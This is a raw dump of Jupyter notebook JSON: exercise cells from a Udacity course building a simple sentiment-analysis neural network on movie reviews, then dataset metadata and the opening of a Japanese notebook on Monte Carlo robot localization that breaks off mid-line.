"**TODO:** We've included the framework of a class called `SentimentNetork`. Implement all of the items marked `TODO` in the code. These include doing the following:\n- Create a basic neural network much like the networks you've seen in earlier lessons and in Project 1, with an input layer, a hidden layer, and an output layer. \n- Do **not** add a non-linearity in the hidden layer. That is, do not use an activation function when calculating the hidden layer outputs.\n- Re-use the code from earlier in this notebook to create the training data (see `TODO`s in the code)\n- Implement the `pre_process_data` function to create the vocabulary for our training data generating functions\n- Ensure `train` trains over the entire corpus",
"_____no_output_____"
],
[
"### Where to Get Help if You Need it\n- Re-watch earlier Udacity lectures\n- Chapters 3-5 - [Grokking Deep Learning](https://www.manning.com/books/grokking-deep-learning) - (Check inside your classroom for a discount code)",
"_____no_output_____"
]
],
[
[
"import time\nimport sys\nimport numpy as np\n\n# Encapsulate our neural network in a class\nclass SentimentNetwork:\n def __init__(self, reviews, labels, hidden_nodes = 10, learning_rate = 0.1):\n \"\"\"Create a SentimenNetwork with the given settings\n Args:\n reviews(list) - List of reviews used for training\n labels(list) - List of POSITIVE/NEGATIVE labels associated with the given reviews\n hidden_nodes(int) - Number of nodes to create in the hidden layer\n learning_rate(float) - Learning rate to use while training\n \n \"\"\"\n # Assign a seed to our random number generator to ensure we get\n # reproducable results during development \n np.random.seed(1)\n\n # process the reviews and their associated labels so that everything\n # is ready for training\n self.pre_process_data(reviews, labels)\n \n # Build the network to have the number of hidden nodes and the learning rate that\n # were passed into this initializer. Make the same number of input nodes as\n # there are vocabulary words and create a single output node.\n self.init_network(len(self.review_vocab),hidden_nodes, 1, learning_rate)\n\n def pre_process_data(self, reviews, labels):\n \n review_vocab = set()\n # TODO: populate review_vocab with all of the words in the given reviews\n # Remember to split reviews into individual words \n # using \"split(' ')\" instead of \"split()\".\n \n # Convert the vocabulary set to a list so we can access words via indices\n self.review_vocab = list(review_vocab)\n \n label_vocab = set()\n # TODO: populate label_vocab with all of the words in the given labels.\n # There is no need to split the labels because each one is a single word.\n \n # Convert the label vocabulary set to a list so we can access labels via indices\n self.label_vocab = list(label_vocab)\n \n # Store the sizes of the review and label vocabularies.\n self.review_vocab_size = len(self.review_vocab)\n self.label_vocab_size = len(self.label_vocab)\n \n # Create a dictionary of words in the vocabulary mapped to index positions\n self.word2index = {}\n # TODO: populate self.word2index with indices for all the words in self.review_vocab\n # like you saw earlier in the notebook\n \n # Create a dictionary of labels mapped to index positions\n self.label2index = {}\n # TODO: do the same thing you did for self.word2index and self.review_vocab, \n # but for self.label2index and self.label_vocab instead\n \n \n def init_network(self, input_nodes, hidden_nodes, output_nodes, learning_rate):\n # Store the number of nodes in input, hidden, and output layers.\n self.input_nodes = input_nodes\n self.hidden_nodes = hidden_nodes\n self.output_nodes = output_nodes\n\n # Store the learning rate\n self.learning_rate = learning_rate\n\n # Initialize weights\n \n # TODO: initialize self.weights_0_1 as a matrix of zeros. These are the weights between\n # the input layer and the hidden layer.\n self.weights_0_1 = None\n \n # TODO: initialize self.weights_1_2 as a matrix of random values. \n # These are the weights between the hidden layer and the output layer.\n self.weights_1_2 = None\n \n # TODO: Create the input layer, a two-dimensional matrix with shape \n # 1 x input_nodes, with all values initialized to zero\n self.layer_0 = np.zeros((1,input_nodes))\n \n \n def update_input_layer(self,review):\n # TODO: You can copy most of the code you wrote for update_input_layer \n # earlier in this notebook. 
\n #\n # However, MAKE SURE YOU CHANGE ALL VARIABLES TO REFERENCE\n # THE VERSIONS STORED IN THIS OBJECT, NOT THE GLOBAL OBJECTS.\n # For example, replace \"layer_0 *= 0\" with \"self.layer_0 *= 0\"\n pass\n \n def get_target_for_label(self,label):\n # TODO: Copy the code you wrote for get_target_for_label \n # earlier in this notebook. \n pass\n \n def sigmoid(self,x):\n # TODO: Return the result of calculating the sigmoid activation function\n # shown in the lectures\n pass\n \n def sigmoid_output_2_derivative(self,output):\n # TODO: Return the derivative of the sigmoid activation function, \n # where \"output\" is the original output from the sigmoid fucntion \n pass\n\n def train(self, training_reviews, training_labels):\n \n # make sure out we have a matching number of reviews and labels\n assert(len(training_reviews) == len(training_labels))\n \n # Keep track of correct predictions to display accuracy during training \n correct_so_far = 0\n \n # Remember when we started for printing time statistics\n start = time.time()\n\n # loop through all the given reviews and run a forward and backward pass,\n # updating weights for every item\n for i in range(len(training_reviews)):\n \n # TODO: Get the next review and its correct label\n \n # TODO: Implement the forward pass through the network. \n # That means use the given review to update the input layer, \n # then calculate values for the hidden layer,\n # and finally calculate the output layer.\n # \n # Do not use an activation function for the hidden layer,\n # but use the sigmoid activation function for the output layer.\n \n # TODO: Implement the back propagation pass here. \n # That means calculate the error for the forward pass's prediction\n # and update the weights in the network according to their\n # contributions toward the error, as calculated via the\n # gradient descent and back propagation algorithms you \n # learned in class.\n \n # TODO: Keep track of correct predictions. To determine if the prediction was\n # correct, check that the absolute value of the output error \n # is less than 0.5. If so, add one to the correct_so_far count.\n \n # For debug purposes, print out our prediction accuracy and speed \n # throughout the training process. \n\n elapsed_time = float(time.time() - start)\n reviews_per_second = i / elapsed_time if elapsed_time > 0 else 0\n \n sys.stdout.write(\"\\rProgress:\" + str(100 * i/float(len(training_reviews)))[:4] \\\n + \"% Speed(reviews/sec):\" + str(reviews_per_second)[0:5] \\\n + \" #Correct:\" + str(correct_so_far) + \" #Trained:\" + str(i+1) \\\n + \" Training Accuracy:\" + str(correct_so_far * 100 / float(i+1))[:4] + \"%\")\n if(i % 2500 == 0):\n print(\"\")\n \n def test(self, testing_reviews, testing_labels):\n \"\"\"\n Attempts to predict the labels for the given testing_reviews,\n and uses the test_labels to calculate the accuracy of those predictions.\n \"\"\"\n \n # keep track of how many correct predictions we make\n correct = 0\n\n # we'll time how many predictions per second we make\n start = time.time()\n\n # Loop through each of the given reviews and call run to predict\n # its label. \n for i in range(len(testing_reviews)):\n pred = self.run(testing_reviews[i])\n if(pred == testing_labels[i]):\n correct += 1\n \n # For debug purposes, print out our prediction accuracy and speed \n # throughout the prediction process. 
\n\n elapsed_time = float(time.time() - start)\n reviews_per_second = i / elapsed_time if elapsed_time > 0 else 0\n \n sys.stdout.write(\"\\rProgress:\" + str(100 * i/float(len(testing_reviews)))[:4] \\\n + \"% Speed(reviews/sec):\" + str(reviews_per_second)[0:5] \\\n + \" #Correct:\" + str(correct) + \" #Tested:\" + str(i+1) \\\n + \" Testing Accuracy:\" + str(correct * 100 / float(i+1))[:4] + \"%\")\n \n def run(self, review):\n \"\"\"\n Returns a POSITIVE or NEGATIVE prediction for the given review.\n \"\"\"\n # TODO: Run a forward pass through the network, like you did in the\n # \"train\" function. That means use the given review to \n # update the input layer, then calculate values for the hidden layer,\n # and finally calculate the output layer.\n #\n # Note: The review passed into this function for prediction \n # might come from anywhere, so you should convert it \n # to lower case prior to using it.\n \n # TODO: The output layer should now contain a prediction. \n # Return `POSITIVE` for predictions greater-than-or-equal-to `0.5`, \n # and `NEGATIVE` otherwise.\n pass\n",
"_____no_output_____"
]
],
[
[
"Run the following cell to create a `SentimentNetwork` that will train on all but the last 1000 reviews (we're saving those for testing). Here we use a learning rate of `0.1`.",
"_____no_output_____"
]
],
[
[
"mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.1)",
"_____no_output_____"
]
],
[
[
"Run the following cell to test the network's performance against the last 1000 reviews (the ones we held out from our training set). \n\n**We have not trained the model yet, so the results should be about 50% as it will just be guessing and there are only two possible values to choose from.**",
"_____no_output_____"
]
],
[
[
"mlp.test(reviews[-1000:],labels[-1000:])",
"_____no_output_____"
]
],
[
[
"Run the following cell to actually train the network. During training, it will display the model's accuracy repeatedly as it trains so you can see how well it's doing.",
"_____no_output_____"
]
],
[
[
"mlp.train(reviews[:-1000],labels[:-1000])",
"_____no_output_____"
]
],
[
[
"That most likely didn't train very well. Part of the reason may be because the learning rate is too high. Run the following cell to recreate the network with a smaller learning rate, `0.01`, and then train the new network.",
"_____no_output_____"
]
],
[
[
"mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.01)\nmlp.train(reviews[:-1000],labels[:-1000])",
"_____no_output_____"
]
],
[
[
"That probably wasn't much different. Run the following cell to recreate the network one more time with an even smaller learning rate, `0.001`, and then train the new network.",
"_____no_output_____"
]
],
[
[
"mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.001)\nmlp.train(reviews[:-1000],labels[:-1000])",
"_____no_output_____"
]
],
[
[
"With a learning rate of `0.001`, the network should finall have started to improve during training. It's still not very good, but it shows that this solution has potential. We will improve it in the next lesson.",
"_____no_output_____"
],
[
"# End of Project 3. \n## Watch the next video to see Andrew's solution, then continue on to the next lesson.",
"_____no_output_____"
],
[
"# Understanding Neural Noise<a id='lesson_4'></a>\n\nThe following cells include includes the code Andrew shows in the next video. We've included it here so you can run the cells along with the video without having to type in everything.",
"_____no_output_____"
]
],
[
[
"from IPython.display import Image\nImage(filename='sentiment_network.png')",
"_____no_output_____"
],
[
"def update_input_layer(review):\n \n global layer_0\n \n # clear out previous state, reset the layer to be all 0s\n layer_0 *= 0\n for word in review.split(\" \"):\n layer_0[0][word2index[word]] += 1\n\nupdate_input_layer(reviews[0])",
"_____no_output_____"
],
[
"layer_0",
"_____no_output_____"
],
[
"review_counter = Counter()",
"_____no_output_____"
],
[
"for word in reviews[0].split(\" \"):\n review_counter[word] += 1",
"_____no_output_____"
],
[
"review_counter.most_common()",
"_____no_output_____"
]
],
[
[
"# Project 4: Reducing Noise in Our Input Data<a id='project_4'></a>\n\n**TODO:** Attempt to reduce the noise in the input data like Andrew did in the previous video. Specifically, do the following:\n* Copy the `SentimentNetwork` class you created earlier into the following cell.\n* Modify `update_input_layer` so it does not count how many times each word is used, but rather just stores whether or not a word was used. ",
"_____no_output_____"
]
],
[
[
"# TODO: -Copy the SentimentNetwork class from Projet 3 lesson\n# -Modify it to reduce noise, like in the video ",
"_____no_output_____"
]
],
[
[
"Run the following cell to recreate the network and train it. Notice we've gone back to the higher learning rate of `0.1`.",
"_____no_output_____"
]
],
[
[
"mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.1)\nmlp.train(reviews[:-1000],labels[:-1000])",
"_____no_output_____"
]
],
[
[
"That should have trained much better than the earlier attempts. It's still not wonderful, but it should have improved dramatically. Run the following cell to test your model with 1000 predictions.",
"_____no_output_____"
]
],
[
[
"mlp.test(reviews[-1000:],labels[-1000:])",
"_____no_output_____"
]
],
[
[
"# End of Project 4. \n## Andrew's solution was actually in the previous video, so rewatch that video if you had any problems with that project. Then continue on to the next lesson.\n# Analyzing Inefficiencies in our Network<a id='lesson_5'></a>\nThe following cells include the code Andrew shows in the next video. We've included it here so you can run the cells along with the video without having to type in everything.",
"_____no_output_____"
]
],
[
[
"Image(filename='sentiment_network_sparse.png')",
"_____no_output_____"
],
[
"layer_0 = np.zeros(10)",
"_____no_output_____"
],
[
"layer_0",
"_____no_output_____"
],
[
"layer_0[4] = 1\nlayer_0[9] = 1",
"_____no_output_____"
],
[
"layer_0",
"_____no_output_____"
],
[
"weights_0_1 = np.random.randn(10,5)",
"_____no_output_____"
],
[
"layer_0.dot(weights_0_1)",
"_____no_output_____"
],
[
"indices = [4,9]",
"_____no_output_____"
],
[
"layer_1 = np.zeros(5)",
"_____no_output_____"
],
[
"for index in indices:\n layer_1 += (1 * weights_0_1[index])",
"_____no_output_____"
],
[
"layer_1",
"_____no_output_____"
],
[
"Image(filename='sentiment_network_sparse_2.png')",
"_____no_output_____"
],
[
"layer_1 = np.zeros(5)",
"_____no_output_____"
],
[
"for index in indices:\n layer_1 += (weights_0_1[index])",
"_____no_output_____"
],
[
"layer_1",
"_____no_output_____"
]
],
[
[
"# Project 5: Making our Network More Efficient<a id='project_5'></a>\n**TODO:** Make the `SentimentNetwork` class more efficient by eliminating unnecessary multiplications and additions that occur during forward and backward propagation. To do that, you can do the following:\n* Copy the `SentimentNetwork` class from the previous project into the following cell.\n* Remove the `update_input_layer` function - you will not need it in this version.\n* Modify `init_network`:\n>* You no longer need a separate input layer, so remove any mention of `self.layer_0`\n>* You will be dealing with the old hidden layer more directly, so create `self.layer_1`, a two-dimensional matrix with shape 1 x hidden_nodes, with all values initialized to zero\n* Modify `train`:\n>* Change the name of the input parameter `training_reviews` to `training_reviews_raw`. This will help with the next step.\n>* At the beginning of the function, you'll want to preprocess your reviews to convert them to a list of indices (from `word2index`) that are actually used in the review. This is equivalent to what you saw in the video when Andrew set specific indices to 1. Your code should create a local `list` variable named `training_reviews` that should contain a `list` for each review in `training_reviews_raw`. Those lists should contain the indices for words found in the review.\n>* Remove call to `update_input_layer`\n>* Use `self`'s `layer_1` instead of a local `layer_1` object.\n>* In the forward pass, replace the code that updates `layer_1` with new logic that only adds the weights for the indices used in the review.\n>* When updating `weights_0_1`, only update the individual weights that were used in the forward pass.\n* Modify `run`:\n>* Remove call to `update_input_layer` \n>* Use `self`'s `layer_1` instead of a local `layer_1` object.\n>* Much like you did in `train`, you will need to pre-process the `review` so you can work with word indices, then update `layer_1` by adding weights for the indices used in the review.",
"_____no_output_____"
]
],
[
[
"# TODO: -Copy the SentimentNetwork class from Project 4 lesson\n# -Modify it according to the above instructions ",
"_____no_output_____"
]
],
[
[
"Run the following cell to recreate the network and train it once again.",
"_____no_output_____"
]
],
[
[
"mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.1)\nmlp.train(reviews[:-1000],labels[:-1000])",
"_____no_output_____"
]
],
[
[
"That should have trained much better than the earlier attempts. Run the following cell to test your model with 1000 predictions.",
"_____no_output_____"
]
],
[
[
"mlp.test(reviews[-1000:],labels[-1000:])",
"_____no_output_____"
]
],
[
[
"# End of Project 5. \n## Watch the next video to see Andrew's solution, then continue on to the next lesson.\n# Further Noise Reduction<a id='lesson_6'></a>",
"_____no_output_____"
]
],
[
[
"Image(filename='sentiment_network_sparse_2.png')",
"_____no_output_____"
],
[
"# words most frequently seen in a review with a \"POSITIVE\" label\npos_neg_ratios.most_common()",
"_____no_output_____"
],
[
"# words most frequently seen in a review with a \"NEGATIVE\" label\nlist(reversed(pos_neg_ratios.most_common()))[0:30]",
"_____no_output_____"
],
[
"from bokeh.models import ColumnDataSource, LabelSet\nfrom bokeh.plotting import figure, show, output_file\nfrom bokeh.io import output_notebook\noutput_notebook()",
"_____no_output_____"
],
[
"hist, edges = np.histogram(list(map(lambda x:x[1],pos_neg_ratios.most_common())), density=True, bins=100, normed=True)\n\np = figure(tools=\"pan,wheel_zoom,reset,save\",\n toolbar_location=\"above\",\n title=\"Word Positive/Negative Affinity Distribution\")\np.quad(top=hist, bottom=0, left=edges[:-1], right=edges[1:], line_color=\"#555555\")\nshow(p)",
"_____no_output_____"
],
[
"frequency_frequency = Counter()\n\nfor word, cnt in total_counts.most_common():\n frequency_frequency[cnt] += 1",
"_____no_output_____"
],
[
"hist, edges = np.histogram(list(map(lambda x:x[1],frequency_frequency.most_common())), density=True, bins=100, normed=True)\n\np = figure(tools=\"pan,wheel_zoom,reset,save\",\n toolbar_location=\"above\",\n title=\"The frequency distribution of the words in our corpus\")\np.quad(top=hist, bottom=0, left=edges[:-1], right=edges[1:], line_color=\"#555555\")\nshow(p)",
"_____no_output_____"
]
],
[
[
"# Project 6: Reducing Noise by Strategically Reducing the Vocabulary<a id='project_6'></a>\n\n**TODO:** Improve `SentimentNetwork`'s performance by reducing more noise in the vocabulary. Specifically, do the following:\n* Copy the `SentimentNetwork` class from the previous project into the following cell.\n* Modify `pre_process_data`:\n>* Add two additional parameters: `min_count` and `polarity_cutoff`\n>* Calculate the positive-to-negative ratios of words used in the reviews. (You can use code you've written elsewhere in the notebook, but we are moving it into the class like we did with other helper code earlier.)\n>* Andrew's solution only calculates a postive-to-negative ratio for words that occur at least 50 times. This keeps the network from attributing too much sentiment to rarer words. You can choose to add this to your solution if you would like. \n>* Change so words are only added to the vocabulary if they occur in the vocabulary more than `min_count` times.\n>* Change so words are only added to the vocabulary if the absolute value of their postive-to-negative ratio is at least `polarity_cutoff`\n* Modify `__init__`:\n>* Add the same two parameters (`min_count` and `polarity_cutoff`) and use them when you call `pre_process_data`",
"_____no_output_____"
]
],
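[
[
"# NOTE: this cell is NOT part of the original project. It is a minimal, hedged sketch of the\n# vocabulary filtering described above, assuming the Counters `total_counts`, `positive_counts`,\n# and `negative_counts` from earlier in the notebook, and log-transformed pos/neg ratios.\n# It only approximates Andrew's solution; the graded work still belongs in the TODO cell below.\nimport numpy as np\nfrom collections import Counter\n\ndef build_filtered_vocab(total_counts, positive_counts, negative_counts,\n                         min_count=20, polarity_cutoff=0.05):\n    \"\"\"Return the set of words that pass the min_count and polarity_cutoff filters.\"\"\"\n    ratios = Counter()\n    for term, cnt in total_counts.most_common():\n        if cnt >= 50:  # only rate words seen often enough to have a stable ratio\n            ratio = positive_counts[term] / float(negative_counts[term] + 1)\n            ratios[term] = np.log(ratio) if ratio > 1 else -np.log(1 / (ratio + 0.01))\n    vocab = set()\n    for term, cnt in total_counts.most_common():\n        # unrated words default to a ratio of 0, so they only survive a zero cutoff\n        if cnt > min_count and (polarity_cutoff == 0 or abs(ratios[term]) >= polarity_cutoff):\n            vocab.add(term)\n    return vocab",
"_____no_output_____"
]
],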
[
[
"# TODO: -Copy the SentimentNetwork class from Project 5 lesson\n# -Modify it according to the above instructions ",
"_____no_output_____"
]
],
[
[
"Run the following cell to train your network with a small polarity cutoff.",
"_____no_output_____"
]
],
[
[
"mlp = SentimentNetwork(reviews[:-1000],labels[:-1000],min_count=20,polarity_cutoff=0.05,learning_rate=0.01)\nmlp.train(reviews[:-1000],labels[:-1000])",
"_____no_output_____"
]
],
[
[
"And run the following cell to test it's performance. It should be ",
"_____no_output_____"
]
],
[
[
"mlp.test(reviews[-1000:],labels[-1000:])",
"_____no_output_____"
]
],
[
[
"Run the following cell to train your network with a much larger polarity cutoff.",
"_____no_output_____"
]
],
[
[
"mlp = SentimentNetwork(reviews[:-1000],labels[:-1000],min_count=20,polarity_cutoff=0.8,learning_rate=0.01)\nmlp.train(reviews[:-1000],labels[:-1000])",
"_____no_output_____"
]
],
[
[
"And run the following cell to test it's performance.",
"_____no_output_____"
]
],
[
[
"mlp.test(reviews[-1000:],labels[-1000:])",
"_____no_output_____"
]
],
[
[
"# End of Project 6. \n## Watch the next video to see Andrew's solution, then continue on to the next lesson.",
"_____no_output_____"
],
[
"# Analysis: What's Going on in the Weights?<a id='lesson_7'></a>",
"_____no_output_____"
]
],
[
[
"mlp_full = SentimentNetwork(reviews[:-1000],labels[:-1000],min_count=0,polarity_cutoff=0,learning_rate=0.01)",
"_____no_output_____"
],
[
"mlp_full.train(reviews[:-1000],labels[:-1000])",
"_____no_output_____"
],
[
"Image(filename='sentiment_network_sparse.png')",
"_____no_output_____"
],
[
"def get_most_similar_words(focus = \"horrible\"):\n most_similar = Counter()\n\n for word in mlp_full.word2index.keys():\n most_similar[word] = np.dot(mlp_full.weights_0_1[mlp_full.word2index[word]],mlp_full.weights_0_1[mlp_full.word2index[focus]])\n \n return most_similar.most_common()",
"_____no_output_____"
],
[
"get_most_similar_words(\"excellent\")",
"_____no_output_____"
],
[
"get_most_similar_words(\"terrible\")",
"_____no_output_____"
],
[
"import matplotlib.colors as colors\n\nwords_to_visualize = list()\nfor word, ratio in pos_neg_ratios.most_common(500):\n if(word in mlp_full.word2index.keys()):\n words_to_visualize.append(word)\n \nfor word, ratio in list(reversed(pos_neg_ratios.most_common()))[0:500]:\n if(word in mlp_full.word2index.keys()):\n words_to_visualize.append(word)",
"_____no_output_____"
],
[
"pos = 0\nneg = 0\n\ncolors_list = list()\nvectors_list = list()\nfor word in words_to_visualize:\n if word in pos_neg_ratios.keys():\n vectors_list.append(mlp_full.weights_0_1[mlp_full.word2index[word]])\n if(pos_neg_ratios[word] > 0):\n pos+=1\n colors_list.append(\"#00ff00\")\n else:\n neg+=1\n colors_list.append(\"#000000\")",
"_____no_output_____"
],
[
"from sklearn.manifold import TSNE\ntsne = TSNE(n_components=2, random_state=0)\nwords_top_ted_tsne = tsne.fit_transform(vectors_list)",
"_____no_output_____"
],
[
"p = figure(tools=\"pan,wheel_zoom,reset,save\",\n toolbar_location=\"above\",\n title=\"vector T-SNE for most polarized words\")\n\nsource = ColumnDataSource(data=dict(x1=words_top_ted_tsne[:,0],\n x2=words_top_ted_tsne[:,1],\n names=words_to_visualize,\n color=colors_list))\n\np.scatter(x=\"x1\", y=\"x2\", size=8, source=source, fill_color=\"color\")\n\nword_labels = LabelSet(x=\"x1\", y=\"x2\", text=\"names\", y_offset=6,\n text_font_size=\"8pt\", text_color=\"#555555\",\n source=source, text_align='center')\np.add_layout(word_labels)\n\nshow(p)\n\n# green indicates positive words, black indicates negative words",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e7090fe50995a47ec6ceb4e4feb09bc9047cecc9 | 527,795 | ipynb | Jupyter Notebook | monte_carlo_localization/5.global_localization.ipynb | ryuichiueda/probrobo_practice | 4d1d49ef4f01a2b77e61fbdbeed6001a8a25d7c3 | [
"MIT"
] | 51 | 2017-04-08T13:40:19.000Z | 2021-01-12T06:57:57.000Z | monte_carlo_localization/5.global_localization.ipynb | ryuichiueda/probrobo_practice | 4d1d49ef4f01a2b77e61fbdbeed6001a8a25d7c3 | [
"MIT"
] | null | null | null | monte_carlo_localization/5.global_localization.ipynb | ryuichiueda/probrobo_practice | 4d1d49ef4f01a2b77e61fbdbeed6001a8a25d7c3 | [
"MIT"
] | 11 | 2017-05-01T09:35:47.000Z | 2020-04-24T07:36:34.000Z | 869.514003 | 37,394 | 0.936074 | [
[
[
"# Monte Carlo Localization\n\n千葉工業大学 上田 隆一\n\n(c) 2017 Ryuichi Ueda\n\nThis software is released under the MIT License, see LICENSE.\n\n## はじめに\n\nこのコードは、1.monte_calro_localization.ipynb のコードを大域的自己位置推定に用いる例です。\n\n## コード\n\nしばらくは 1.monte_calro_localization.ipynb と同じです。",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport numpy as np\nfrom copy import copy\nimport math, random\nimport matplotlib.pyplot as plt # for plotting data\nfrom matplotlib.patches import Ellipse # for drawing\n\nclass Gaussian2D:\n # 共分散行列、中心の座標を属性に持つ\n def __init__(self,sigma_x = 1.0, sigma_y = 1.0, cov_xy = 0.0,mu_x = 0.0, mu_y = 0.0):\n self.cov = np.array([[sigma_x**2,cov_xy],[cov_xy,sigma_y**2]])\n self.mean = np.array([mu_x,mu_y]).T\n \n # ガウス分布の移動\n def shift(self,delta,angle):\n ca = math.cos(angle)\n sa = math.sin(angle)\n rot = np.array([[ca,sa],[-sa,ca]])\n \n self.cov = rot.dot(self.cov).dot(rot.T)\n self.mean = self.mean + delta\n \n # 密度の算出\n def value(self, pos):\n delta = pos - self.mean\n numerator = math.exp(-0.5 * (delta.T).dot(np.linalg.inv(self.cov)).dot(delta))\n denominator = 2 * math.pi * math.sqrt(np.linalg.det(self.cov))\n return numerator / denominator\n\nclass Landmarks:\n def __init__(self,array):\n self.positions = array\n \n def draw(self):\n xs = [ e[0] for e in self.positions]\n ys = [ e[1] for e in self.positions]\n plt.scatter(xs,ys,s=300,marker=\"*\",label=\"landmarks\",color=\"orange\")\n \n\nclass Observation:\n def __init__(self,robot_pos, landmark,lid):\n # センサの有効範囲の設定\n self.sensor_max_range = 1.0\n self.sensor_min_range = 0.1\n self.sensor_max_angle = math.pi / 2\n self.sensor_min_angle = - math.pi /2 \n \n # ランドマークのIDを保存しておく属性。ランドマークがセンサの有効範囲にないとNoneのまま\n self.lid = None\n \n # 真の位置の情報をセットする。ロボットの真の姿勢はシミュレーション用でロボットは知らないという前提。\n # 真のランドマークの位置は、ロボットは知っているのでこのインスタンスの属性として保存します。\n rx,ry,rt = robot_pos\n self.true_lx,self.true_ly = landmark\n \n # ロボットからランドマークまでの距離の真値を算出\n distance = math.sqrt((rx-self.true_lx)**2 + (ry-self.true_ly)**2)\n if distance > self.sensor_max_range or distance < self.sensor_min_range:\n return\n \n # ロボットからランドマークがどの方向に見えるか真値を算出\n direction = math.atan2(self.true_ly-ry, self.true_lx-rx) - rt\n if direction > math.pi: direction -= 2*math.pi\n if direction < -math.pi: direction += 2*math.pi \n if direction > self.sensor_max_angle or direction < self.sensor_min_angle:\n return\n \n # 真値に混入する雑音の大きさ(標準偏差)を設定\n sigma_distance = distance * 0.1 # 距離に対して10%の標準偏差\n sigma_direction = math.pi * 3 / 180 # ランドマークの方向に対して3degの標準偏差\n \n # 雑音を混ぜてセンサの値とする\n self.distance = random.gauss(distance, sigma_distance) \n self.direction = random.gauss(direction, sigma_direction)\n \n # ロボット座標系での共分散行列を作っておく。あとで尤度を計算するときに使用\n # x方向が奥行きで、sigma_distanceを標準偏差に設定。y方向がロボットから見て横方向の誤差で、距離*sin(3[deg])となる。\n self.error_ellipse = Gaussian2D(sigma_x = sigma_distance, sigma_y = self.distance * math.sin(sigma_direction) , cov_xy = 0.0)\n\n self.lid = lid\n \n # 尤度の計算(遅い実装です。)\n # パーティクルの姿勢とランドマークの計測値からランドマークの位置を推定し、その位置に誤差楕円を置き、\n # ランドマークの真の位置が誤差楕円からどれだけ外れているかを確率密度関数の密度として返します。\n # この計算はもっと簡略化できますが、描画の関係でこういう手順を踏んでいます。\n # 簡略な方法: パーティクルの姿勢とランドマークの真の位置から、想定されるランドマークの距離・方向を算出し、\n # 実際の距離・方向とそれぞれ比較する方法。距離の誤差の傾向、方向の誤差の傾向をそれぞれ1次元のガウス分布で表現し、\n # それぞれを独立して計算して尤度を算出し、掛け算する。\n def likelihood(self,particle_pos): \n # パーティクルの姿勢と、このインスタンスに保存されているセンサの値から、ランドマークの位置を求める\n rx, ry, rt = particle_pos\n proposed_lx = rx + self.distance * math.cos(rt + self.direction)\n proposed_ly = ry + self.distance * math.sin(rt + self.direction)\n \n # このインスタンスに保存されている共分散行列を、計算されたランドマークの位置に移し、パーティクルの向きに合わせて共分散行列を回転\n e = copy(self.error_ellipse)\n e.shift(np.array([proposed_lx, proposed_ly]).T, rt + self.direction)\n\n # そのままガウス分布の計算式から密度(尤度)を返します。\n return e.value(np.array([self.true_lx,self.true_ly]).T)\n \n # 描画用\n def ellipse(self,robot_pos):\n rx, ry, rt = robot_pos[0], robot_pos[1], robot_pos[2]\n proposed_lx 
